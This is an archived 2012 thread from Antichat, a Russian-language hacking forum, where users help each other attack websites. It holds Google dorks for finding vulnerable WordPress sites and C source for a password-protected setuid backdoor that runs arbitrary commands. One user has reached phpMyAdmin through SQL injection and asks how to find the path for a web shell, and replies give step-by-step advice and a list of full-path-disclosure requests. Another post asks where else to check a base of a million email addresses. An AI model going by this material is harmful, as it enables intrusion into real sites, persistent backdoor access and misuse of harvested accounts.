HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20541  
Старый 30.04.2012, 16:33
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от Cock3r  
Cock3r said:
Подскажите, пожалуйста, дорк для поиска WP блогов.
Хотя бы так

inurl:"?author=admin"

Цитата:
Сообщение от Cock3r  
Cock3r said:
сам-то пробовал вбивать?мусора много, такая же ситуация и с inurl:wp-content
Человек тебе хотел помочь.
 
Ответить с цитированием

  #20542  
Старый 30.04.2012, 16:44
Jakeroid
Новичок
Регистрация: 09.05.2009
Сообщений: 14
Провел на форуме:
64334

Репутация: 3
Отправить сообщение для Jakeroid с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Хотя бы так
inurl:"?author=admin"
Человек тебе хотел помочь.
А если автор не админ? Ну зарегал себе ник другой?
 
Ответить с цитированием

  #20543  
Старый 30.04.2012, 17:25
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Код:
Code:
inurl:"wp-login.php?action=register"
inurl:"plugins/wp-forum"
"index of /" wp-forum
Хотя бы так...
 
Ответить с цитированием

  #20544  
Старый 30.04.2012, 20:36
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585

Репутация: 0
По умолчанию

такой вопрос. Есть база мыльников(1кк, микс). На что её можно чекнуть? ICQ, steam,origin, twitter, facebook чекнуты. Мб есть что ещё?
 
Ответить с цитированием

  #20545  
Старый 30.04.2012, 20:52
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Cock3r  
Cock3r said:
Подскажите, пожалуйста, дорк для поиска WP блогов.
"powered by wordpress"

же
 
Ответить с цитированием

  #20546  
Старый 30.04.2012, 21:09
Jakeroid
Новичок
Регистрация: 09.05.2009
Сообщений: 14
Провел на форуме:
64334

Репутация: 3
Отправить сообщение для Jakeroid с помощью ICQ
По умолчанию

Цитата:
Сообщение от попугай  
попугай said:
"powered by wordpress"
же
Дык, затерают же часто.
 
Ответить с цитированием

  #20547  
Старый 30.04.2012, 21:14
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Скомпилируйте суидник на FreeBSD:

Код:
Code:
#include 
#include 
main(int argc, char *argv[]) {
 if(argc == 3){
    if(strcmp(argv[1],"cool_pass") == 0){
       setgid(310);
       setuid(16745);
       system(argv[2]);
    }
 }
 return 0;
}
 
Ответить с цитированием

  #20548  
Старый 30.04.2012, 23:51
heJiZzZ
Новичок
Регистрация: 01.06.2009
Сообщений: 7
Провел на форуме:
19099

Репутация: 2
По умолчанию

Через скулю получил доступ к phpMyAdmin, file_priv=Y, хочу залить шелл, но понял что не знаю полный пусть до папки! При раскрутке скули ошибок с раскрытием путей не было. Можно ли как нибудь средствами phpMyAdmin узнать путь, куда можно шелл ливануть?
 
Ответить с цитированием

  #20549  
Старый 01.05.2012, 00:03
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

попробуй подобрать для начало дефолтный путь до файла конфигов httpd.conf, в нем посмотри диру в какой сайт установлен, попробуй с нее index.php прочитать, если найдешь то пробуй заливаться в папки с изображениями или авами они часто с полными правами, что дает возможность заливаться...

P.S: вот список дефолтных логов можешь тут взглянуть /thread49775-default.html

еще также может гугл помочь с раскрытием путей попробуй дорк такого плана

Цитата:
Сообщение от None  
site:test1.ru "mysql_"
 
Ответить с цитированием

  #20550  
Старый 01.05.2012, 00:06
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

ищи phpinfo

или

запросы которые могут привести к раскрытию путей

Код:
Code:
Full path disclosure :
/sсriрts/check_lang.php
/themes/darkblue_orange/layout.inc.php
/index.php?lang[]=
/index.php?target[]=
/index.php?db[]=
/index.php?goto[]=
/left.php?server[]=
/index.php?table[]=
/server_databases.php?token=your_token&sort_by="
/index.php?db=information_schema&token=your_token&tbl_group[]=
/db_printview.php?db="
/sql.php?back[]=
libraries/string.lib.php
libraries/storage_engines.lib.php
libraries/sqlparser.lib.php
libraries/sql_query_form.lib.php
libraries/select_theme.lib.php
libraries/select_lang.lib.php
libraries/relation_cleanup.lib.php
libraries/left_header.inc.php
libraries/import.lib.php
libraries/header_meta_style.inc.php
libraries/grab_globals.lib.php
libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
libraries/display_import.lib.php
libraries/display_export.lib.php
libraries/display_create_table.lib.php
libraries/display_create_database.lib.php
libraries/db_table_exists.lib.php
libraries/database_interface.lib.php
libraries/common.lib.php
libraries/check_user_privileges.lib.php
libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
libraries/import/sql.php
libraries/fpdf/ufpdf.php
libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ